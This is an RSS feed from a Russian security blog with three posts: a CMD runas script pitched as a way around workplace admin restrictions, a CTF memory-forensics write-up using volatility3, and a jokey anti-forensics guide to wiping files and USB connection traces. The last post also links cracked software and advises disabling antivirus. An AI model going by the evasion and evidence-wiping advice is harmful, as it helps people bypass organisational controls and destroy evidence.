<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>Hunter Ghoul</title><generator>teletype.in</generator><description><![CDATA[Hunter Ghoul]]></description><image><url>https://img4.teletype.in/files/b3/07/b3072e46-6eb0-4032-8378-be092824b488.png</url><title>Hunter Ghoul</title><link>https://teletype.in/@hunterghoul_team</link></image><link>https://teletype.in/@hunterghoul_team?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hunterghoul_team</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/hunterghoul_team?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/hunterghoul_team?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Thu, 14 May 2026 16:26:54 GMT</pubDate><lastBuildDate>Thu, 14 May 2026 16:26:54 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@hunterghoul_team/cmd1</guid><link>https://teletype.in/@hunterghoul_team/cmd1?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hunterghoul_team</link><comments>https://teletype.in/@hunterghoul_team/cmd1?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hunterghoul_team#comments</comments><dc:creator>hunterghoul_team</dc:creator><title>Runas - пишем скрипт для запуска исполняемых файлов Windows от имени другого пользователя</title><pubDate>Thu, 24 Apr 2025 14:15:55 GMT</pubDate><media:content medium="image" url="https://img2.teletype.in/files/9f/9b/9f9b14ab-4c5d-44f6-ba1d-e0500f593ae6.png"></media:content><category>dev</category><description><![CDATA[<img src="https://img1.teletype.in/files/c4/d5/c4d53c29-df3e-4dd7-aca3-cb04cc4046d8.png"></img>Всем привет! Сегодня мы с вами научимся писать свой первый простенький скрипт для командной строки Windows. В этой статье мы рассмотрим основные проблемы кодировок в CMD, команды вывода пользователей и фильтрации данных с помощью т.н. &quot;конвейера&quot;, а также рассмотрим встроенную программу &quot;runas&quot;]]></description><content:encoded><![CDATA[
  <figure id="2XrK" class="m_column">
    <img src="https://img1.teletype.in/files/c4/d5/c4d53c29-df3e-4dd7-aca3-cb04cc4046d8.png" width="973" />
  </figure>
  <p id="wPay">Всем привет! Сегодня мы с вами научимся писать свой первый простенький скрипт для командной строки Windows. В этой статье мы рассмотрим основные проблемы кодировок в CMD, команды вывода пользователей и фильтрации данных с помощью т.н. &quot;конвейера&quot;, а также рассмотрим встроенную программу &quot;runas&quot;</p>
  <p id="l350">Первым делом рассмотрим структуру нашего скрипта:</p>
  <pre id="9EaN">@echo off
chcp 65001
echo. &amp; echo ---Текущее имя пользователя---
whoami
echo. &amp; echo ---Имена всех пользователей---
chcp 866
echo.
wmic useraccount get name, status | find &quot;OK&quot;
echo. &amp; echo --------------------
chcp 65001
echo. &amp; set /p username=&quot;Введите имя пользователя: &quot;
echo Выбран пользователь: %username%
set /p userpath=&quot;Перенесите сюда .exe приложение которое хотите запустить (не ярлык) и нажмите Enter: &quot;
echo &quot;Попытка запуска приложения...&quot;
echo %username% %userpath%
runas /user:%username% %userpath%</pre>
  <p id="GbFi">Вот собственно наш код. Давайте подробнее изучим основные его строки.</p>
  <figure id="dpYC" class="m_column">
    <img src="https://img3.teletype.in/files/29/d8/29d8355b-9cec-42b3-ab53-779e08eacad0.png" width="751" />
  </figure>
  <p id="FAyV">chcp &lt;номер кодировки&gt; - отвечает за переключение кодировки в открытой cmd сессии. Это требуется для нормальной работы с кириллицей и латиницей, а также иными языками, плохо работающими на базовой Windows кодировке.</p>
  <p id="acxX">echo. - просто ставит enter в выводе в консоли, отображая ваше сообщение или результат выполнения команды на новой строке.</p>
  <p id="cUBp">echo &lt;ваше сообщение&gt; - выводит сообщение на экран.</p>
  <p id="hmUQ">@echo off - убирает ваш ввод команд скрипта, что убирает лишний хлам в выводе в консоли.</p>
  <p id="1yCh">set &lt;имя переменной&gt; &lt;значение переменной&gt; - сохраняет в памяти значение для заданной переменной. Если такой переменной нет, создает её и сохраняет в ней указанное значение.</p>
  <p id="9NlT">set /p &lt;имя переменной&gt; &lt;Placeholder - он же заполнитель текста&gt; - дает возможность задать пользователю значение переменной с помощью ввода текста в CMD.</p>
  <p id="A1dM">echo %имя_переменной% - выводит значение переменной. Использование %имя_переменной% в любом месте команд вставляет сохраненное значение переменной</p>
  <p id="qd21">runas /user:%username% %userpath% - запускает указанную программу от имени указанного пользователя.</p>
  <p id="uqEq">whoami - вывод текущего пользователя с которого вы сидите</p>
  <p id="0cD0">wmic useraccount - выводит в сыром виде все аккаунты</p>
  <p id="sC00">get name, status | find &quot;OK&quot; - фильтрует данные и выводит релевантные учетки.</p>
  <p id="hcbZ">Каков итог?</p>
  <p id="Dckq">Теперь с помощью данного скрипта вы можете не меняя учетную запись запустить программу от имени другого пользователя. В ряде определенных случаев это бывает очень полезно, особенно когда вы на работе и нужно что-то запустить от имени админа, не выходя из рабочей учетки, но при этом классический метод запуска от имени админа заблокирован политикой безопасности.</p>
  <p id="hNVD">Всё что нужно это:</p>
  <p id="z7Ht">1. Запустить скрипт</p>
  <p id="MQUs">2. Выбрать нужного пользователя</p>
  <p id="coKE">3. Указать абсолютный путь в кавычках ИЛИ - просто перетащить EXE (важно, не ярлык) файл в консоль</p>
  <p id="QoDk">4. Ввести пароль от выбранной учетки</p>
  <p id="SU3D">5. Готово! Если прога поддерживает данную фичу, то всё успешно запустится и будет работать.</p>
  <p id="jjwX">На этом всё. Такая вот простенькая и коротенькая статья, учащая базовым командам в cmd и написанию скриптов без всяких python и прочих зависимостей ^)</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hunterghoul_team/volatility</guid><link>https://teletype.in/@hunterghoul_team/volatility?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hunterghoul_team</link><comments>https://teletype.in/@hunterghoul_team/volatility?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hunterghoul_team#comments</comments><dc:creator>hunterghoul_team</dc:creator><title>Write-up: расследуем бэкап VMware с volatility3</title><pubDate>Sat, 16 Nov 2024 10:54:46 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/38/61/3861577c-8937-4420-ac83-00e80152acc6.png"></media:content><category>forensic</category><description><![CDATA[<img src="https://img2.teletype.in/files/94/60/94602eda-b9d6-48cc-b1f8-f0d57aac2a05.png"></img>Всем привет! Сегодня мы с вами будем проходить задание CTF по расследованию (forensic - компьютерная криминалистика) резервной копии виртуальной машины VMWare.]]></description><content:encoded><![CDATA[
  <figure id="2E49" class="m_original">
    <img src="https://img2.teletype.in/files/94/60/94602eda-b9d6-48cc-b1f8-f0d57aac2a05.png" width="249" />
  </figure>
  <p id="d5CK">Всем привет! Сегодня мы с вами будем проходить задание CTF по расследованию (forensic - компьютерная криминалистика) резервной копии виртуальной машины VMWare.</p>
  <p id="ibrK">Приступим.</p>
  <h3 id="Jm5y">Вводные данные</h3>
  <p id="TNcB">И так, всё что мы имеем - это некий файл формата .vmem</p>
  <figure id="3yZN" class="m_column">
    <img src="https://img1.teletype.in/files/c4/0d/c40dd84b-5dc1-4643-ace9-b50effafafa6.png" width="699" />
  </figure>
  <p id="RhYA">Если <a href="https://www.solvusoft.com/ru/file-extensions/file-extension-vmem/" target="_blank">погуглить</a> инфу что это за файл, то найдем что это резервная копия VMware машины:</p>
  <figure id="DEdI" class="m_column">
    <img src="https://img3.teletype.in/files/69/0e/690eb749-e00e-441f-91bb-ac9474b4a290.png" width="1201" />
  </figure>
  <p id="eD54">Ну и тут уже встаёт вопрос - как этот файл открыть и изучить? Логично в голову приходит желание скачать VMware Workstation, но спешу вас расстроить - из этого ничего не выйдет. Да и если получится импортировать бэкап (если что backup - это резервная копия, мало ли кто не знал <s>сочувствую вам</s>) и запустить виртуальную машину, то мы нарушим тот временной промежуток в который была сделана резервная копия, ведь машина продолжит работать дальше и если там был например какой-то вирус шифровальщик, то он просто зашифрует нам машину.</p>
  <p id="YvSn">Из этого следует, что стоит погуглить чем можно открыть данный файл:</p>
  <figure id="OIqT" class="m_column">
    <img src="https://img3.teletype.in/files/2e/ca/2ecacd88-aebf-41c0-9c61-be91b51e72e6.png" width="929" />
  </figure>
  <p id="BB0I">Ну и здесь нам выпадают видео и статьи по решению данных проблем. Программа называется <a href="https://github.com/volatilityfoundation/volatility3" target="_blank">volatility3</a>.</p>
  <p id="Lz3k">Переходим по ссылке выше и копируем ссылку на репозиторий:</p>
  <figure id="5nw2" class="m_column">
    <img src="https://img1.teletype.in/files/09/de/09de8eeb-5a64-4f98-b208-5e4853a51c20.png" width="1166" />
  </figure>
  <p id="MX2C">Если у вас не установлен на системе git, то можете установить его, либо просто скачать архивом данный репозиторий и распаковать у себя в удобном месте.</p>
  <p id="yhJI">Далее приступим к работе с данным инструментом.</p>
  <h3 id="nJ3j">Установка Volatility3</h3>
  <p id="kOfW">Что нам нужно установить перед этим:</p>
  <ol id="w8bt">
    <li id="TD3t">Git (опционально) - скачать можно <a href="https://git-scm.com/downloads" target="_blank">здесь</a>.</li>
    <li id="61EZ">Python - скачать последнюю версию <a href="https://www.python.org/" target="_blank">здесь</a>.</li>
    <li id="vbKt">Volatility3 - скачать с <a href="https://github.com/volatilityfoundation/volatility3" target="_blank">репозитория</a>.</li>
  </ol>
  <p id="XU2E">Ну и в общем то всё, установка на любой системе Windows/Unix. Главное чтобы был python с pip. </p>
  <p id="pdki">Теперь заходим в распакованную папку с репозиторием. Лично я скачаю репозиторий с помощью git командой:</p>
  <p id="ZKu7"><code>git clone https://github.com/volatilityfoundation/volatility3.git</code></p>
  <figure id="XD4u" class="m_column">
    <img src="https://img1.teletype.in/files/01/10/0110cd0a-1505-4939-af50-a35ce4f81e99.png" width="1393" />
  </figure>
  <p id="wWSG">Скачал в ту же папку где и находится наш файл</p>
  <figure id="74wK" class="m_column">
    <img src="https://img4.teletype.in/files/b9/2a/b92a6c43-6273-47f4-8ca2-01426b8c36fb.png" width="982" />
  </figure>
  <p id="OrQl">Открываем терминал в данной папке, идем в папку volatility3 и пишем команду:</p>
  <p id="e8r9"><code>pip install -r requirements.txt</code></p>
  <p id="lq1E">У кого Unix система с разными питонами пишут соответственно для третьей версии:</p>
  <p id="DKax"><code>pip3 install -r requirements.txt</code></p>
  <p id="0JlW">Далее запускаем программу командой:</p>
  <p id="XD0z"><code>python vol.py -h</code></p>
  <p id="aRml">Для Unix аналогично по необходимости добавляем троечку:</p>
  <p id="BcTF"><code>python3 vol.py -h</code></p>
  <figure id="eIkU" class="m_column">
    <img src="https://img2.teletype.in/files/18/91/18911e3f-53db-494a-a19f-cab9f2608f98.png" width="1417" />
  </figure>
  <figure id="H0By" class="m_column">
    <img src="https://img1.teletype.in/files/01/fe/01fe8eb4-72fc-4d7d-805b-557040636810.png" width="1458" />
  </figure>
  <p id="h1Mh">На этом установка окончена.</p>
  <p id="azA9">Документация официальная <a href="https://volatility3.readthedocs.io/en/latest/" target="_blank">здесь</a>.</p>
  <h3 id="rGI2">Расследуем инцидент (ну в смысле флаг дайте мне йоу)</h3>
  <p id="LiW3">Окей, установили, открыли, теперь разбираемся что тут происходит.</p>
  <p id="J5j2">Для начала кто хочет повторить всё со мной скачайте файл бэкапа для расследования - скачать <a href="https://t.me/hunterghoulchat/96" target="_blank">тут</a>.</p>
  <p id="jSrg">Как я писал в своем посте ранее (кто не читал вот <a href="https://t.me/hunterghoul_team/23" target="_blank">ссылочка</a>) у нас есть модули, поделенные на три раздела по системам:</p>
  <ul id="fe8m">
    <li id="OJeH">windows.название_модуля</li>
    <li id="rBH2">linux.название_модуля</li>
    <li id="fDqV">mac.название_модуля</li>
  </ul>
  <p id="uTu5">Ну соответственно формат команды в нашем случае примерно такой:</p>
  <p id="u0qJ">python vol.py -f путь_до_нашей_резервной_копии и далее команда.</p>
  <p id="4M8p">Например:</p>
  <p id="NIf3"><code>python vol.py -f ../task.vmem windows.info</code></p>
  <p id="Nk4B">Здесь я указал относительный путь о котором писал в своих статьях ранее. Кто не читал рекомендую <a href="https://teletype.in/@hunterghoul_team/path-traversal" target="_blank">ознакомиться</a>.</p>
  <p id="Wfvh">Здесь никто вам не мешает указать абсолютный:</p>
  <p id="H2bP"><code>python vol.py -f D:\download\love_keys\task.vmem windows.info</code></p>
  <p id="idrO">Если всё успешно, у вас пойдет процесс разбора копии и чтение его данных:</p>
  <figure id="krLL" class="m_column">
    <img src="https://img3.teletype.in/files/6e/7d/6e7d0389-8f18-4e92-9489-30f8abbd3539.png" width="1463" />
  </figure>
  <p id="pKv6">В данном случае не было информации какая именно система, так что сначала я попробовал пару команд для linux, что ни к чему не привело, затем к windows, и тут уже мне что-то показало:</p>
  <figure id="ukJl" class="m_column">
    <img src="https://img2.teletype.in/files/9f/b5/9fb5d366-2bd7-43bb-a973-526108c5eaaf.png" width="765" />
  </figure>
  <p id="y1GN">Модуль windows.info показывает нам общие данные виртуальной windows системы.</p>
  <p id="i50M">Нам же для решения задачи нужно найти файл в котором спрятан флаг (в реальности это может быть вирус или что-угодно, улика в общем).</p>
  <p id="3eHg">Для этого запустим следующую команду:</p>
  <p id="yi6Q"><code>python vol.py -f ../task.vmem windows.filescan &gt; file.txt</code></p>
  <p id="mI3a">Здесь:</p>
  <ul id="t1nd">
    <li id="rKFP">windows.filescan - вытягивает все файлы из системы</li>
    <li id="ZP8H">&gt; file.txt - перенаправляет весь результат в файл</li>
  </ul>
  <p id="gPBF">Теперь открываем наш файлик после выполнения команды (даже если выдало ошибку как у меня) любым удобным редактором, хоть блокнотом:</p>
  <figure id="7K1u" class="m_column">
    <img src="https://img2.teletype.in/files/9c/2e/9c2efa5d-6a1e-409f-9e89-8e89a18ce173.png" width="1291" />
  </figure>
  <p id="tZqa">Здесь видим offset - это адрес памяти в котором  хранится содержимое файла, и name - путь до файла с его названием.</p>
  <p id="gR2E">Нам интересно следующее - давайте посмотрим какие есть пользователи в этой системе. Для этого выполним поиск по пути \Users\</p>
  <figure id="mEqq" class="m_column">
    <img src="https://img2.teletype.in/files/5f/72/5f72b12e-1667-4e23-ba71-c3722ed55f4f.png" width="1347" />
  </figure>
  <p id="2JYy">Видим что у нас есть некий пользователь Oleg. Хорошо, давайте дополним наш путь \Users\Oleg\ и посмотрим что у нашего олега за файлы.</p>
  <figure id="8iSi" class="m_column">
    <img src="https://img1.teletype.in/files/4d/79/4d7900fe-fc67-44e9-9bfd-438822fcbfe7.png" width="1363" />
  </figure>
  <p id="pDPA">Пролистав некоторое количество строк видим такой вот интересный файл (хотя куда более интересно выглядит файл с базой данных на первом скрине, но да ладно).</p>
  <p id="hoiy">Попробуем его выкачать. Для этого нам понадобится наш offset - то есть адрес памяти указанный слева:</p>
  <figure id="Q5pz" class="m_column">
    <img src="https://img4.teletype.in/files/fa/f0/faf0167f-2670-4909-80cd-b284f370daad.png" width="1424" />
  </figure>
  <p id="gX1X">Копируем его и вбиваем в следующую команду:</p>
  <p id="GyWy"><code>python vol.py -f ../task.vmem windows.dumpfiles --physaddr 0x1e47d5f0</code></p>
  <p id="rspk">Где:</p>
  <ul id="AKbG">
    <li id="FOQA">windows.dumpfile - выкачивает из резервной копии наш файл</li>
    <li id="QuMS">--physaddr offset_файла - указывает на файл который нам надо выкачать.</li>
  </ul>
  <p id="ngou">Если не указать адрес и ввести просто:</p>
  <p id="cWgL"><code>python vol.py -f ../task.vmem windows.dumpfiles</code></p>
  <p id="kKsX">То эта команда выкачает все файлы из бэкапа.</p>
  <p id="QT6r">Оно нам надо? Оно нам не надо. Вводим команду и получаем такой вот файл:</p>
  <figure id="1Oee" class="m_column">
    <img src="https://img3.teletype.in/files/e0/41/e0413820-4b71-4962-b64f-4b36eea128ce.png" width="1388" />
  </figure>
  <p id="xjdm">Теперь ищем его в папке с нашей утилитой</p>
  <figure id="g4Ou" class="m_column">
    <img src="https://img2.teletype.in/files/98/f2/98f26c29-87ae-4454-b0b1-b5ae0b112d6a.png" width="899" />
  </figure>
  <p id="IaGI">Отлично, откроем его с помощью того же блокнота:</p>
  <figure id="yMfm" class="m_column">
    <img src="https://img3.teletype.in/files/61/77/61778c8d-a178-4c02-ba77-2ba43b484482.png" width="1232" />
  </figure>
  <p id="4AQo">Как видим кодировка не позволяет нам прочитать что тут написано.</p>
  <p id="JaH7">У нас есть два варианта:</p>
  <p id="5Dfw">Вариант 1 (геморройный)</p>
  <p id="ye35">Идем на сайт <a href="https://2cyr.com/decode/" target="_blank">https://2cyr.com/decode/</a> вставляем туда нашу абракадабру и нажимаем на ок:</p>
  <figure id="fbXk" class="m_column">
    <img src="https://img2.teletype.in/files/d4/4d/d44d4af6-de76-4d35-9441-63600e80d11a.png" width="1892" />
  </figure>
  <p id="muNI">После этого у нас появляется окно с возможностью выбрать адекватную кодировку. Смотрим на то, что более похоже на читаемый текст.</p>
  <figure id="ftqO" class="m_column">
    <img src="https://img2.teletype.in/files/d7/65/d765fcf1-2f4e-4f15-9d7f-12102bd44dc9.png" width="1907" />
  </figure>
  <p id="TJhf">Находим что-то более читаемое в этих списках. Тыкаем на это и жмем на ок.</p>
  <figure id="JWy7" class="m_column">
    <img src="https://img3.teletype.in/files/2a/7a/2a7a09aa-b19f-402b-b7ab-3b8354905e89.png" width="1288" />
  </figure>
  <figure id="AJrT" class="m_column">
    <img src="https://img3.teletype.in/files/e0/90/e090cdf5-d0f8-4107-ad97-cd7dfb9477c4.png" width="1910" />
  </figure>
  <p id="BNtS">Окей, мы получили что-то, но ещё не то что надо. Пробуем следующие варианты из списка.</p>
  <p id="d2Nz">И в конечном итоге натыкаемся на вариант без всяких Ав ^ и прочих странных символов:</p>
  <figure id="JdjD" class="m_column">
    <img src="https://img4.teletype.in/files/73/a5/73a5ed7f-a83f-4d86-8a55-d506b24f7635.png" width="1910" />
  </figure>
  <p id="6nm4">Вариант второй - ибо зачем вариант первый.</p>
  <p id="RFRR">Качаем <a href="https://notepad-plus-plus.org/downloads/" target="_blank">Notepad++</a> и открываем через него наш файл:</p>
  <figure id="oeAw" class="m_column">
    <img src="https://img2.teletype.in/files/9a/32/9a32e2bd-d8cd-4181-b748-0b0273b64d19.png" width="921" />
  </figure>
  <p id="W9YY">P.S. лично у меня в России этот блокнот провайдер заблокировал так как в нём спрятался самый опасный террорист в мире, так что кто тоже в беде можете скачать последнюю версию с <a href="https://t.me/hunterghoulchat/97" target="_blank">моего канала</a>.</p>
  <p id="U0YY">Теперь нам остается только убрать все пробелы.</p>
  <p id="r2Dn">Для этого я написал простой скрипт на python который это сделает за вас. Просто скопируйте содержимое файла и вставьте в окно ввода программы:</p>
  <figure id="L0t2" class="m_column">
    <img src="https://img2.teletype.in/files/93/b2/93b2a938-d964-4011-bac0-11167ade63d7.png" width="1667" />
  </figure>
  <p id="wXqX">Скачать скрипт можно <a href="https://t.me/hunterghoulchat/98" target="_blank">здесь</a>. Запуск командой:</p>
  <p id="Mz1Q"><code>python delnull.py</code></p>
  <figure id="Nsra" class="m_column">
    <img src="https://img2.teletype.in/files/10/39/1039c8b2-b9ed-4766-a0ba-075d19d505fa.png" width="1356" />
  </figure>
  <h3 id="PxLW">Итоги</h3>
  <p id="aWPt">Компьютерная криминалистика - интересное занятие, требующее усидчивости, хороших навыков в автоматизации анализа собираемой информации, в том числе с помощью написания собственных скриптов.</p>
  <p id="7Ekv">Попробуйте повторить данные действия дома чтобы поближе проникнуться в мир форензики.</p>
  <p id="Gb06">Благодарю за прочтение статьи.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hunterghoul_team/clear</guid><link>https://teletype.in/@hunterghoul_team/clear?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hunterghoul_team</link><comments>https://teletype.in/@hunterghoul_team/clear?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hunterghoul_team#comments</comments><dc:creator>hunterghoul_team</dc:creator><title>Bleach-Bitch - или чистим следы после взлома Пентагона</title><pubDate>Thu, 14 Nov 2024 12:25:28 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/bf/29/bf29b1be-d880-401d-b6f1-bd70b04c8573.png"></media:content><category>Anonimity</category><description><![CDATA[<img src="https://img1.teletype.in/files/8b/84/8b84bfbb-3b17-4e0d-af8f-eb2aafa0fe0d.png"></img>Всем привет! Сегодня мы рассмотрим приложения для чистки следов и затирания жесткого диска. Приятного прочтения.]]></description><content:encoded><![CDATA[
  <p id="NyJV">Всем привет! Сегодня мы рассмотрим приложения для чистки следов и затирания жесткого диска. Приятного прочтения.</p>
  <h3 id="tTBt">Дисклеймер</h3>
  <p id="JRha">Автор статьи категорически против нарушения законодательства стран. Изложенная информация предоставлена исключительно в образовательных целях в шуточной форме. Использование данной информации для сокрытия улик жестоко карается по закону. Автор не несет ответственности за действия читателей.</p>
  <h3 id="0Oam">Введение</h3>
  <p id="bxmJ">И так, вы решительно удалили лучшее свое домашнее видео перед трудоустройством в силовые структуры. И тут всё бы ничего, ваш телефон забрали на проверку из-за некоторых опасений и дополнительном сборе информации. И вот ваш товарищ майор прикрывшись газеткой наяривает на вас и вашу жену. Как так вышло? Сейчас рассмотрим простым языком.</p>
  <p id="K5b2">Жесткий диск (это то куда вы качаете с торрента репаки и майнеры) хранит в себе информацию по блокам. Все блоки представляют собой файловую систему, в которой хранится метаинформация и данные. А ещё в нем есть таблица разделов.</p>
  <p id="0Fcq">Блок - это часть жесткого диска, отвечающая за определенную часть хранения конкретных данных. Например загрузочный блок хранит в себе информацию для загрузчика. При запуске системы именно этот блок считывается компьютером первый, в котором лежит программа и все необходимые для неё данные для успешного запуска системы.</p>
  <p id="fz6w">Метаинформация - это свойства хранимых файлов и папок в данном блоке жесткого диска. Например:</p>
  <figure id="uX05" class="m_column">
    <img src="https://img1.teletype.in/files/8b/84/8b84bfbb-3b17-4e0d-af8f-eb2aafa0fe0d.png" width="448" />
  </figure>
  <p id="xUJM">Помимо этих атрибутов ещё хранится прочая служебная информация о файле/папке для её успешного открытия, например диапазон адресов на которых хранится данный файл (в случае если файл не помещается в один блок). Однако всё это отлично друг от друга в зависимости от типа таблицы разметки.</p>
  <p id="s4w2">Данные - это собственно данные программы.</p>
  <p id="MWx7">Таблица разделов - это по сути та самая загрузочная часть и разделение на томы (диски). Вот таблицы разделов:</p>
  <figure id="vSec" class="m_column">
    <img src="https://img3.teletype.in/files/e4/5d/e45d4be8-789b-4512-bcaa-48f101478e74.png" width="640" />
  </figure>
  <p id="9V4g">MBR - старая загрузочная таблица разделов, работает с BIOS.</p>
  <p id="2Bna">GPT - новая, усовершенствованная система загрузки системы и разделения жесткого диска, работает с UEFI.</p>
  <p id="qCSp">Если у вас старый ПК - вероятно у вас MBR. Если более современный - скорее всего GPT.</p>
  <p id="C0Q9">И последнее, файловая система - это таблица вашего диска, то, как будут храниться ваши данные. Вот они:</p>
  <figure id="98fu" class="m_column">
    <img src="https://img1.teletype.in/files/0e/6b/0e6bf506-d1bc-4ee9-9b34-1a7584af160e.png" width="445" />
    <figcaption>Файловые системы Linux</figcaption>
  </figure>
  <figure id="jbe9" class="m_column">
    <img src="https://img4.teletype.in/files/f8/d7/f8d7cbd0-ecfa-480a-b74b-833c82070ad1.png" width="656" />
    <figcaption>Файловые системы Windows</figcaption>
  </figure>
  <h3 id="7BPX">Правда про удаление файлов</h3>
  <p id="H9Xd">И так, из теории выше следует вычленить несколько моментов:</p>
  <ol id="iwlx">
    <li id="6iKE">Загрузочный раздел - оттуда можно получить инфу о вашей системе и в теории поискать изъяны. Рекомендую зашифровать загрузочный раздел, например использовав <a href="https://habr.com/ru/articles/558254/" target="_blank">VeraCrypt</a>.</li>
    <li id="2fhf">Файловая система - от неё зависит как будут храниться наши данные на жестком диске</li>
  </ol>
  <p id="vHdQ">Теперь вернемся к тому как майоры смотрят чужие домашние фильмы. </p>
  <p id="raJa">Всё дело в удалении информации с жесткого диска.</p>
  <p id="kH2P">Представьте, мы впервые устанавливаем винду/линукс на наш новенький жесткий диск (хотя он может и не новенький на самом деле). Первым делом мы его форматируем - то есть мы берем свою школьную тетрадь, стираем с неё все линии и выбираем, как будем её размечать: в клеточку; прописью; широкой прописью и так далее, в зависимости от того для какого предмета мы будем её использовать. Про красную линию само собой не забываем. Вот в жёстком диске всё точно также.</p>
  <p id="J7Ya">Окей, мы отформатировали диск, накатили систему, проги, документы и так далее.</p>
  <p id="9nXU">Теперь важный момент про хранение и работы с хранимой на жестком диске инфой. Информация которая записывается на жёсткий диск, записывается в определенные блоки, каждый из которых разделен на ячейки по некоторое количество бит (в зависимости от выбранной файловой системы). И далее на нашем пк создается этот файл который мы можем открыть. Но на самом деле мы видем не наш файл с данными, а ссылку на адрес, в котором хранится информация о том, в каких блоках и ячейках хранится наш файл.</p>
  <p id="oWrJ">Понимаю, сложно, давайте вернемся к нашей тетради. Представьте, что вы разметили вашу тетрадь допустим в клеточку и ещё пронумеровали каждую страницу и каждую в ней строчку. И вот вы на какой-то случайно выбранной странице записали решение некого уравнения. Чтобы вам долго не искать где вы его сохранили, вы у себя на первой странице написали название этого уравнения и адрес (страницу и номер строчки) где вы написали его решение. Вот так если совсем по простому работает жёсткий диск. На самом деле мы оставляем себе несколько главных страниц, и отступив место начинаем сплошным текстом писать решения уравнений, а на главных страницах мы пишем название и прочую полезную информацию (метаинформация), номер страницы, номер строки, номер клетки начала нашего решения уравнения и номер окончания нашего решения уравнения, чтобы не спутать с другими данными.</p>
  <p id="HheY">А что происходит когда мы удаляем наш файл?</p>
  <p id="jBGX">В таком случае происходит удаление не самих данных где записано наше решение уравнение, а ссылка на то, где это решение находится. То есть мы просто удаляем инфу о том, на какой странице, строчке, с какой там по счёту клеточки и до какой клетки мы записали решение уравнения (ибо мы храним инфу сплошняком без пробелов для экономии места на диске, а на главной странице просто пишем как из этого беспорядочного текста найти то что нам надо).</p>
  <p id="ezQ9">И как вы понимаете, в этом и кроется вся лазейка - всё что нам надо, это определить файловую систему, таблицу разделов и то, каким образом происходит запись на диск. Так и работают программы для восстановления данных.</p>
  <p id="NOOY">Например попробуйте восстановить ваши удаленные в корзине файлы с помощью <a href="https://www.auslogics.com/en/software/file-recovery/" target="_blank">Auslogics File Recovery</a> - скачать крякнутую версию можно <a href="https://t.me/hunterghoulchat/89" target="_blank">здесь</a> (предварительно отключите АВ на случай блокировки процедуры восстановления удаленных файлов).</p>
  <figure id="0m3y" class="m_column">
    <img src="https://img2.teletype.in/files/10/35/103549ef-7697-4306-8250-2aedfa72242d.png" width="1357" />
    <figcaption>Пример нахождения удаленной программы UFED 4PC.</figcaption>
  </figure>
  <p id="4j92">Как мы видим, просканировав диск D мы нашли удаленные данные которые можем восстановить, хотя в корзине мы и ничего не смогли найти полезного.</p>
  <h3 id="tLQA">Удаление файлов без восстановления</h3>
  <p id="xBoP">Всё в той же выше программе мы слева в меню можем выбрать различные очистки дисков, которые затерут наши данные нулями.</p>
  <p id="UG4q">Вернемся к нашей тетрадке. Мы удалили информацию о том, где хранится наше уравнение. Но теперь, когда мы знаем все нюансы, мы можем удалить с помощью специальных программ (с помощью ластика) не просто где хранится наше уравнение, но и само его решение, при этом не стерев другие.</p>
  <p id="hyKN">В компуктерах это называется &quot;затереть нулями&quot;. То есть мы переходим по адресу где хранился наш файл, и затираем значения бит (которые образуют в совокупности информацию хранимую в файле) нулями - то есть, ничем. Таким образом полностью стирая файл с <s>лица земли</s> жесткого диска.</p>
  <p id="Gxe3">Для этого можем также использовать следующие программы:</p>
  <p id="9Ejs">Privazer - скачать <a href="https://t.me/hunterghoulchat/90%5C" target="_blank">тут</a>.</p>
  <figure id="5dkJ" class="m_column">
    <img src="https://img2.teletype.in/files/16/01/160165b4-90fd-49bb-8dcd-88aa96b4dcc0.png" width="986" />
  </figure>
  <p id="wHIg">Пожалуй лучшее решение для удаления всех следов из системы. Также присутствует функция бесследного удаления файлов, которые мы ещё не удалили, что гарантирует сразу полное затирание файла без возможности восстановления:</p>
  <figure id="Nb9k" class="m_column">
    <img src="https://img3.teletype.in/files/2e/53/2e53d1bf-0027-4008-a5ca-035213311386.png" width="983" />
  </figure>
  <p id="6QCi">BleachBit - вероятно придется качать через VPN. Для винды можно скачать <a href="https://t.me/hunterghoulchat/91" target="_blank">тут</a>. Для линукса можно скачать на их <a href="https://www.bleachbit.org/download" target="_blank">официальном сайте</a>.</p>
  <figure id="Lij7" class="m_column">
    <img src="https://img3.teletype.in/files/a5/85/a585a599-f81b-4042-b32f-e7eea7d7ec64.png" width="995" />
  </figure>
  <p id="Q5uq">Позволяет удалить большой спектр следов. Одно из лучших решений очистки, в том числе если щёлкнуть по иконке очистки также можно удалить файлы и папки с затиранием следов. Просто, удобно, эффективно (а главное бесплатно и бех кряков).</p>
  <figure id="eVed" class="m_column">
    <img src="https://img3.teletype.in/files/a9/43/a943d91c-f3bc-4227-b6ad-f0f277cabc6f.png" width="980" />
  </figure>
  <p id="UlWd">USBdeview - единственное рабочее приложение которое я знаю, удаляющее следы подключения к пк всех USB устройств (камеры, телефоны, принтеры и так далее).</p>
  <figure id="OwrH" class="m_column">
    <img src="https://img3.teletype.in/files/a3/5a/a35a2bdd-c82d-410e-87c0-d32675771e7d.png" width="1406" />
  </figure>
  <p id="AXJL">Можете зажать левый SHIFT, щелкнуть по самому нижнему файлу для выбора всех подключений. Либо зажать левый CTRL и тыкнуть мышкой по тем, которые мы хотим удалить. Затем нажать на урну (второй значек). Либо на крестик (для извлечения устройств) а затем на урну для удаления следов подключения этого устройства к пк.</p>
